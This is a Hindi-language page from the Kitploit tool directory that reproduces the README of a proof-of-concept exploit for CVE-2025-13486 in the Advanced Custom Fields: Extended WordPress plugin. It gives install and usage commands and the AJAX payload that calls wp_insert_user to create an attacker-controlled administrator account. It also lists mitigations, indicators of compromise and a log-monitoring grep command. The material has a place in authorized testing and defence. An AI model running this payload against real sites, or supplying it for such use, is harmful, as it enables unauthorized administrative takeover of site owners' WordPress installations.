Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-13486 — Advanced Custom Fields Extended (ACFE) WordPress प्लगइन शोषण RCE - एडमिन निर्माण | Kitploit
उपकरण/GitHubGitHub/0xgh057r3c0n/cve-2025-13486
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHub0xgh057r3c0n/cve-2025-13486

CVE-2025-13486

Advanced Custom Fields Extended (ACFE) WordPress प्लगइन शोषण RCE - एडमिन निर्माण

रिपॉजिटरी देखें
1119 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

🔴 CVE-2025-13486 - एडवांस्ड कस्टम फील्ड्स एक्सटेंडेड (ACFE) वर्डप्रेस प्लगइन शोषण

WordPress Python License Status

वर्डप्रेस लोगो

📋 अवलोकन

CVE-2025-13486 के लिए प्रूफ-ऑफ-कॉन्सेप्ट शोषण, जो एडवांस्ड कस्टम फील्ड्स: एक्सटेंडेड (ACFE) वर्डप्रेस प्लगइन में एक गंभीर भेद्यता है जो रिमोट कोड निष्पादन और विशेषाधिकार वृद्धि की अनुमति देती है।

🎯 भेद्यता विवरण

पहलूविवरण
CVE IDCVE-2025-13486
प्लगइनएडवांस्ड कस्टम फील्ड्स: एक्सटेंडेड (ACFE)
प्रकाररिमोट कोड निष्पादन → विशेषाधिकार वृद्धि
जोखिम स्तरगंभीर
प्रभावित संस्करणACFE कमजोर संस्करण (विशिष्ट संस्करण निर्धारित किए जाने हैं)
CVSS स्कोर9.8 क्रिटिकल
खोज तिथि2025
लेखक0xgh057r3c0n

⚠️ नैतिक उपयोग अस्वीकरण

⚠️ चेतावनी: यह उपकरण केवल अधिकृत सुरक्षा परीक्षण और शैक्षिक उद्देश्यों के लिए है।

✅ अनुमत उपयोग:

  • सुरक्षा अनुसंधान और शिक्षा
  • अपने स्वयं के सिस्टम का परीक्षण
  • लिखित अनुमति के साथ अधिकृत पेनिट्रेशन परीक्षण
  • शैक्षणिक अनुसंधान और शिक्षण
  • सुरक्षा जागरूकता प्रशिक्षण

❌ निषिद्ध उपयोग:

  • उन सिस्टम का अनधिकृत परीक्षण जिनके आप मालिक नहीं हैं
  • दुर्भावनापूर्ण हमले या हैकिंग
  • कोई भी अवैध गतिविधि
  • कंप्यूटर धोखाधड़ी कानूनों का उल्लंघन (CFAA, आदि)
  • अनैतिक सुरक्षा परीक्षण

लेखक इस उपकरण के किसी भी दुरुपयोग के लिए उत्तरदायी नहीं है। किसी भी सिस्टम का परीक्षण करने से पहले हमेशा उचित लिखित प्राधिकरण प्राप्त करें।

🔧 विशेषताएं

🔍 सत्यापन मोड

  • वर्डप्रेस पृष्ठों से nonce निष्कर्षण
  • print_r फ़ंक्शन का उपयोग करके भेद्यता की पुष्टि
  • शोषण के बिना सुरक्षित सत्यापन
  • nonce का पता लगाने के लिए बहु-पैटर्न मिलान

⚡ शोषण मोड

  • wp_insert_user के माध्यम से प्रशासनिक उपयोगकर्ता निर्माण
  • कस्टम या यादृच्छिक रूप से उत्पन्न क्रेडेंशियल
  • कस्टम उपयोगकर्ता नाम, पासवर्ड और ईमेल के लिए समर्थन
  • सफलता संकेतकों के लिए प्रतिक्रिया विश्लेषण

🛠️ तकनीकी विशेषताएं

  • स्वचालित प्रोटोकॉल पहचान (HTTP/HTTPS)
  • रंग-कोडित टर्मिनल आउटपुट
  • परीक्षण वातावरण के लिए SSL सत्यापन बाईपास
  • विस्तृत त्रुटि रिपोर्टिंग और डिबगिंग
  • सत्र टाइमआउट और कनेक्शन हैंडलिंग

📦 स्थापना

आवश्यकताएँ

  • Python 3.6+
  • requests लाइब्रेरी

सेटअप

root@kitploit:~
# रिपॉजिटरी क्लोन करें
git clone https://github.com/0xgh057r3c0n/CVE-2025-13486.git
cd CVE-2025-13486

# निर्भरताएं इंस्टॉल करें
pip install requests

# वैकल्पिक: requirements.txt से इंस्टॉल करें
pip install -r requirements.txt

# स्क्रिप्ट को निष्पादन योग्य बनाएं (Linux/Mac)
chmod +x exploit.py

निर्भरताएं

एक requirements.txt फ़ाइल बनाएं:

root@kitploit:~
requests>=2.25.1

🚀 उपयोग

मूल सिंटैक्स

root@kitploit:~
python3 exploit.py --url <लक्ष्य_URL> [विकल्प]

उदाहरण

1. केवल भेद्यता सत्यापित करें (सुरक्षित परीक्षण)

root@kitploit:~
python3 exploit.py --url http://target.com --verify

2. यादृच्छिक क्रेडेंशियल के साथ शोषण करें

root@kitploit:~
python3 exploit.py --url https://target.com

3. कस्टम क्रेडेंशियल के साथ शोषण करें

root@kitploit:~
python3 exploit.py --url https://target.com \
  --user backup_admin \
  --password "P@ssw0rd123!" \
  --email [email protected]

4. प्रोटोकॉल के बिना लक्ष्य (स्वतः पहचान)

root@kitploit:~
python3 exploit.py --url target.com --verify

कमांड लाइन विकल्प

विकल्पविवरणआवश्यकडिफ़ॉल्ट
-u, --urlलक्ष्य वर्डप्रेस URLहां-
--verifyकेवल सत्यापन, कोई शोषण नहींनहींFalse
--userप्रशासक के लिए कस्टम उपयोगकर्ता नामनहींadmin_XXXXX
--passwordप्रशासक के लिए कस्टम पासवर्डनहींयादृच्छिक 12 अक्षर
--emailप्रशासक के लिए कस्टम ईमेलनहीं[email protected]

🧪 यह कैसे काम करता है

1. भेद्यता तंत्र

यह शोषण ACFE प्लगइन के acfe/form/render_form_ajax एंडपॉइंट में अनुचित फ़ंक्शन हैंडलिंग का लाभ उठाता है, जिससे हमलावर मनमाने PHP फ़ंक्शन कॉल कर सकते हैं।

2. तकनीकी प्रवाह

root@kitploit:~
1. URL सत्यापन → HTTP/HTTPS का स्वत: पता लगाना
2. Nonce निष्कर्षण → ACF nonce के लिए पृष्ठ स्कैन करना
3. पेलोड निर्माण → दुर्भावनापूर्ण AJAX अनुरोध बनाना
4. अनुरोध निष्पादन → लक्ष्य पर शोषण भेजना
5. परिणाम विश्लेषण → सफलता संकेतकों की जाँच करना

3. शोषण पेलोड

root@kitploit:~
// ACFE में कमजोर कोड पैटर्न
$result = call_user_func_array($form['render'], array($form));

// शोषण पेलोड संरचना
{
    "action": "acfe/form/render_form_ajax",
    "nonce": "extracted_nonce",
    "form[render]": "wp_insert_user",
    "form[user_login]": "attacker_user",
    "form[user_pass]": "attacker_pass",
    "form[user_email]": "[email protected]",
    "form[role]": "administrator"
}

🛡️ शमन

तत्काल कार्रवाई

  1. प्लगइन अपडेट करें: तुरंत ACFE प्लगइन को नवीनतम संस्करण में अपडेट करें
  2. प्लगइन हटाएं: यदि अपडेट उपलब्ध नहीं है, तो अस्थायी रूप से ACFE अक्षम करें
  3. वेब एप्लिकेशन फ़ायरवॉल: दुर्भावनापूर्ण अनुरोधों को ब्लॉक करने के लिए WAF नियम तैनात करें
  4. निगरानी: संदिग्ध प्रशासक उपयोगकर्ता निर्माण के लिए निगरानी करें

वर्डप्रेस सुरक्षा सख्तीकरण

root@kitploit:~
# अनुशंसित सुरक्षा प्लगइन्स
1. Wordfence Security
2. Sucuri Security
3. iThemes Security
4. All In One WP Security

# सर्वर-स्तरीय सुरक्षा
- दर सीमा लागू करें
- mod_security नियम सक्षम करें
- Cloudflare या समान CDN का उपयोग करें
- नियमित सुरक्षा ऑडिट

🔍 पहचान

समझौते के संकेतक (IOCs)

  • अनधिकृत प्रशासक उपयोगकर्ता निर्माण
  • /wp-admin/admin-ajax.php पर संदिग्ध AJAX अनुरोध
  • action=acfe/form/render_form_ajax वाले अनुरोध
  • AJAX के माध्यम से अप्रत्याशित wp_insert_user फ़ंक्शन कॉल

लॉग निगरानी

root@kitploit:~
# Apache लॉग
grep "admin-ajax.php" /var/log/apache2/access.log | grep "acfe/form"

# WordPress डिबग लॉग
define('WP_DEBUG', true);
define('WP_DEBUG_LOG', true);

📚 संदर्भ

  1. वर्डप्रेस प्लगइन रिपॉजिटरी: एडवांस्ड कस्टम फील्ड्स: एक्सटेंडेड
  2. CVE डेटाबेस: CVE-2025-13486
  3. वर्डप्रेस सुरक्षा टीम: प्लगइन सुरक्षा दिशानिर्देश
  4. OWASP टॉप 10: इंजेक्शन अटैक

🤝 योगदान

  1. रिपॉजिटरी को फोर्क करें
  2. एक फीचर ब्रांच बनाएं (git checkout -b feature/improvement)
  3. परिवर्तन कमिट करें (git commit -am 'Add new feature')
  4. ब्रांच पर पुश करें (git push origin feature/improvement)
  5. पुल रिक्वेस्ट बनाएं

योगदानकर्ता दिशानिर्देश

  • PEP 8 Python शैली गाइड का पालन करें
  • जटिल तर्क के लिए टिप्पणियां जोड़ें
  • त्रुटि हैंडलिंग शामिल करें
  • दस्तावेज़ीकरण अपडेट करें

🐛 समस्याओं की रिपोर्ट करना

कृपया बग और समस्याओं की रिपोर्ट यहां करें:

  1. GitHub Issues: नई समस्या बनाएं
  2. सुरक्षा भेद्यताएं: पहले लेखक को जिम्मेदार प्रकटीकरण

📊 परियोजना संरचना

root@kitploit:~
CVE-2025-13486/
├── exploit.py          # मुख्य शोषण स्क्रिप्ट
├── README.md           # यह दस्तावेज़ीकरण
├── requirements.txt    # Python निर्भरताएं
├── LICENSE            # MIT लाइसेंस फ़ाइल
├── examples/          # उपयोग उदाहरण
│   ├── verification.txt
│   └── exploitation.txt
└── tests/             # परीक्षण स्क्रिप्ट
    ├── test_verify.py
    └── test_exploit.py

👨‍💻 लेखक

0xgh057r3c0n - सुरक्षा शोधकर्ता

  • GitHub: @0xgh057r3c0n
  • Twitter: @0xgh057r3c0n

📜 लाइसेंस

यह परियोजना MIT लाइसेंस के तहत लाइसेंस प्राप्त है - विवरण के लिए LICENSE फ़ाइल देखें।

सुरक्षा समुदाय के लिए ❤️ से निर्मित
⚠️ जिम्मेदारी और नैतिकता से उपयोग करें ⚠️

टूल डाउनलोड करें